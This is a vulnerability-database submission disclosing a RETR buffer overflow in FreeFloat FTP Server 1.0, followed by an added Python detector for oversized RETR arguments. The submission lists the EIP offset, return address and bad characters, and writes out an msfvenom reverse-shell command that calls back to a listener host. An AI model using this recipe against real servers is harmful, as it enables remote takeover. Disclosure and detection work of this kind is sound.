Submit #585402: FreeFloat FTP Server 1.0 Buffer Overflow

Title: FreeFloat FTP Server 1.0 Buffer Overflow
Description: This vulnerability is found in the `RETR` command of Freefloat FTP Server 1.0. The `RETR` command is typically used to download a file from the server. However, when we send a `RETR` request containing 246 bytes of offset data, we overwrite the EIP (Extended Instruction Pointer). Once the 4 bytes of the EIP are reached, we overwrite it with a JMP instruction located at address `\x74\xe3\x2f\xd9`. After identifying a suitable JMP address, we determined the list of bad characters to be `\x00`, `\x0a`, and `\x0d`. These characters needed to be excluded from the shellcode to avoid corrupting the payload.

With the buffer structure defined, we appended a shellcode generated using Metasploit’s msfvenom tool, with the following command:

`msfvenom -p windows/shell_reverse_tcp LHOST=192.168.176.136 LPORT=4444 EXITFUNC=thread -b '\x00\x0a\x0d' -a x86 --platform Windows -f perl`

Note: We included a NOP sled consisting of 20 bytes of `0x90` (NOP instructions) before the shellcode to ensure proper alignment and stability during execution. NOPs (No Operation instructions) act as a buffer zone, increasing the chances that the execution flow safely reaches the shellcode. This is a common technique in buffer overflow exploits.

In order for the reverse shell to work, Netcat must be running in listening mode on port 4444. Once the exploit is successfully executed, the shellcode initiates a reverse connection, granting remote access to the vulnerable machine. The exploit was tested in an environment running. A version of this exploit written in Perl is available at the following GitHub address:
Source: ⚠️ https://github.com/r3ng4f/FreeFloat_1/blob/main/01-exploit.txt
User: r3ng4f (UID 73285)
Submission: 27/05/2025 14:47 (1 year ago)
Moderation: 29/05/2025 12:02 (2 days later)
Status: Accepted
VulDB entry: 310503 [FreeFloat FTP Server 1.0 RETR Command buffer overflow]
Points: 20
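
A defensive check built from the figures in the description above, as an added example that is not part of the submission or of VulDB: it flags `RETR` lines on an FTP control channel whose argument reaches the 246-byte offset or carries a run of `0x90` bytes. The function names, the `MIN_NOP_RUN` threshold and the sample lines are assumptions constructed for illustration.

```python
# Added example: flag FTP RETR commands long enough to reach the saved EIP
# described in the report. The sample traffic is constructed, not captured.

EIP_OFFSET = 246   # from the report: RETR argument bytes that precede EIP
NOP = 0x90         # from the report: sled byte placed before the payload
MIN_NOP_RUN = 8    # assumption: shortest run of 0x90 worth alerting on


def longest_run(data: bytes, value: int) -> int:
    """Length of the longest consecutive run of `value` in `data`."""
    best = cur = 0
    for b in data:
        cur = cur + 1 if b == value else 0
        best = max(best, cur)
    return best


def inspect_command(line: bytes) -> list:
    """Return the reasons one FTP control-channel line is suspicious."""
    verb, _, arg = line.rstrip(b"\r\n").partition(b" ")
    if verb.upper() != b"RETR":          # FTP verbs are case-insensitive
        return []
    reasons = []
    if len(arg) >= EIP_OFFSET:           # a deployment may pick a lower limit
        reasons.append(f"argument length {len(arg)} >= {EIP_OFFSET}")
    run = longest_run(arg, NOP)
    if run >= MIN_NOP_RUN:
        reasons.append(f"run of {run} 0x90 bytes")
    return reasons


def scan(lines):
    """Return [(index, reasons)] for every flagged line, in order."""
    flagged = [(i, inspect_command(line)) for i, line in enumerate(lines)]
    return [(i, reasons) for i, reasons in flagged if reasons]


# Constructed control-channel lines: filler bytes only, no working payload.
SAMPLE = [
    b"USER anonymous\r\n",
    b"RETR readme.txt\r\n",
    b"RETR " + b"A" * 246 + b"BBBB" + b"\x90" * 20 + b"C" * 32 + b"\r\n",
    b"retr " + b"x" * 300 + b"\r\n",
]

if __name__ == "__main__":
    for idx, why in scan(SAMPLE):
        print(idx, "; ".join(why))
```
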
